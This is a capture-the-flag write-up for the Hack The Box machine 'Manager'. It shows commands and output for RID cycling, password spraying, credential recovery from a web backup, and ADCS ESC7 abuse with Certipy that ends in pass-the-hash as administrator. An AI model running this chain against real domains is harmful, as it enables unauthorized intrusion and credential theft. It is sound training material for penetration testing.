Enumeration
Nmap
We’ll use Nmap to scan the remote host and check for any open ports.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.134 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.235.134 -oN nmap_tcp -vPORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-09 15:20:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
|_ssl-date: 2025-09-09T15:22:27+00:00; +7h00m50s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
| ms-sql-info:
| 10.129.235.134:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-09T15:10:54
| Not valid after: 2055-09-09T15:10:54
| MD5: d180:ef3e:9a36:78fe:5a0f:44f5:fa37:301d
|_SHA-1: be6e:f7b3:9128:02ad:50df:3e19:5912:a27d:d20b:d273
| ms-sql-ntlm-info:
| 10.129.235.134:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-09T15:22:27+00:00; +7h00m50s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
49734/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m50s, deviation: 0s, median: 7h00m50s
| smb2-time:
| date: 2025-09-09T15:21:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
The Nmap scan shows multiple open ports, including those usually associated with domain controller services, a web server on port 80, an SMB service on port 445, and an SQL server on port 1433.
We also observe that the domain name is manager.htb, so we’ll add this entry to our /etc/hosts file.
echo "10.129.235.134 manager.htb" | sudo tee -a /etc/hostsHTTP
When we visit port 80 in the browser, we find a static website that appears to have very limited functionality.
SMB
We’ll enumerate the SMB shares with the smbclient tool, attempting to list all available shares through a null session.
└──╼ [★]$ smbclient -L \\\\10.129.235.134 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.235.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The listed SMB shares don’t provide anything useful. However, since null sessions are allowed, we can attempt RID cycling to enumerate users.
RID cycling works by incrementally querying the RID portion of Windows SIDs, which are assigned sequentially to users and groups. This can reveal valid accounts.
To do this, we use the lookupsid module from the Impacket toolkit.
└──╼ [★]$ impacket-lookupsid anonymous@manager.htb -no-pass
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at manager.htb
[*] StringBinding ncacn_np:manager.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
<SNIP>
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)We extract only the SidTypeUser entries and save them into a file called usernames.txt.
└──╼ [★]$ cat usernames.txt
administrator
zhong
cheng
ryan
raven
jinwoo
chinHae
operatorIt is fairly common for users to set their password the same as their username. With that in mind, we’ll try a password spraying attack using the simple username = password pattern.
We can use netexec to attempt SMB authentication against the target.
└──╼ [★]$ nxc smb 10.129.235.134 -u usernames.txt -p usernames.txt --no-bruteforce
SMB 10.129.235.134 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.235.134 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\chinHae:chinHae STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [+] manager.htb\operator:operator We now have the password for operator.
Foothold
We’ll try connecting to the MSSQL Server, as it might provide us with some access to the filesystem. This can be done using the mssqlclient module from the Impacket.
└──╼ [★]$ impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)> We can use the xp_dirtree to explore the filesystem and list directory contents.
SQL (MANAGER\Operator guest@master)> xp_dirtree \
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0 We’ll have a look through the web root at /inetpub/wwwroot to see what’s inside.
SQL (MANAGER\Operator guest@master)> xp_dirtree \inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1 Here we find an intriguing file, website-backup-27-07-23-old.zip, which looks to be a backup of the site. Since it’s stored in the web root, we should be able to download it.
wget http://10.129.235.134/website-backup-27-07-23-old.zipAfter extracting the backup, we discover a hidden file named .old-conf.xml.
website-backup-27-07-23-old.zip -d wesite
cd website
ls -la
└──╼ [★]$ ls -la
total 68
drwxr-xr-x 5 knuckl3s knuckl3s 4096 Sep 9 03:51 .
drwxr-xr-x 6 knuckl3s knuckl3s 4096 Sep 9 03:51 ..
-rw-r--r-- 1 knuckl3s knuckl3s 5386 Jul 27 2023 about.html
-rw-r--r-- 1 knuckl3s knuckl3s 5317 Jul 27 2023 contact.html
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 css
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 images
-rw-r--r-- 1 knuckl3s knuckl3s 18203 Jul 27 2023 index.html
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 js
-rw-r--r-- 1 knuckl3s knuckl3s 698 Jul 27 2023 .old-conf.xml
-rw-r--r-- 1 knuckl3s knuckl3s 7900 Jul 27 2023 service.htmlThe .old-conf.xml file reveals password for the Raven.
└──╼ [★]$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3n<SNIP></password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>We use netexec to spray the credentials and check whether they allow access through WinRM.
└──╼ [★]$ nxc winrm 10.129.235.134 -u raven -p 'R4v3n<SNNIP>'
WINRM 10.129.235.134 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.129.235.134 5985 DC01 [+] manager.htb\raven:R4v3n<SNIP> (Pwn3d!)We connect to the target using Evil-WinRM.
└──╼ [★]$ evil-winrm -i 10.129.235.134 -u raven -p 'R4v3n<SNIP>'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>The user flag is located in Raven’s Desktop:
*Evil-WinRM* PS C:\Users\Raven\Desktop> cat user.txt
192a<SNIP>f0dcPrivilege Escalation
We’ll check the Certification Authority for possible misconfigurations and use Certipy to uncover any vulnerabilities.
Follow the setup guide to install Certipy. Depending on your environment, you might need to use the command certipy-ad instead of certipy.
└──╼ [★]$ certipy find -u raven -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templatesThe report shows that the user Raven has risky permissions, specifically ManageCA rights on the Certification Authority. This means we can potentially abuse the ESC7 scenario to escalate privileges to Domain Admin while acting as Raven.
To move forward, we’ll first add Raven as an officer, which will allow us to manage and manually issue certificates.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.235.134:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.235.134
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'Now that we’ve been added as an officer, we can both issue and manage certificates. Using the -enable-template flag, we can enable the SubCA template on the CA.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -enable-template subca
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-dc01-ca'We can view the enabled certificate templates by running the command with the -list-templates flag.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -list-templates
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Enabled certificate templates on 'manager-dc01-ca':
SubCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
AdministratorWith the prerequisites in place (having Manage Certificates rights via ManageCA and confirming the SubCA template is enabled) we can now request a certificate using the SubCA template.
Although this request will be denied, it will still generate a request ID and a private key, which we then save to a file.
└──╼ [★]$ certipy req -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 19
Would you like to save the private key? (y/N) y
[*] Saved private key to 19.key
[-] Failed to request certificateWe see that the certificate request ID is 19. Using our granted permissions, we can now manually issue the previously failed certificate with the ca command and the -issue-request <request ID> parameter.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -issue-request 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got access denied trying to issue certificateIf you encounter [-] Got access denied trying to issue certificate, rerun the command that added Raven as a manager. The cleanup scripts on the box may have reverted the permissions back to their original state.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.235.134:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.235.134
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -issue-request 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificateWe can fetch the issued certificate using the req command along with the -retrieve <request ID> parameter.
└──╼ [★]$ certipy req -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -retrieve 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 19
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '19.key'
[*] Saved certificate and private key to 'administrator.pfx'With the administrator’s PFX file, we can now use it for authentication. However, running the auth command gives the error KRB_AP-ERR_SKEW (Clock skew too great).
This happens when the time on our machine is out of sync with the KDC servers, which breaks Kerberos authentication. To fix it, we need to turn off Automatic Date & Time on our system and manually sync the clock by running the following command:
sudo ntpdate -s manager.htbRe-running the command now works as expected and successfully dumps the administrator hash.
└──╼ [★]$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3<SNIP>04ee:ae50<SNIP>24efWe use the administrator’s hash to log in via Evil-WinRM and successfully capture the root flag from the system.
└──╼ [★]$ evil-winrm -i manager.htb -u administrator -H ae50<SNIP>24ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
839b<SNIP>4e88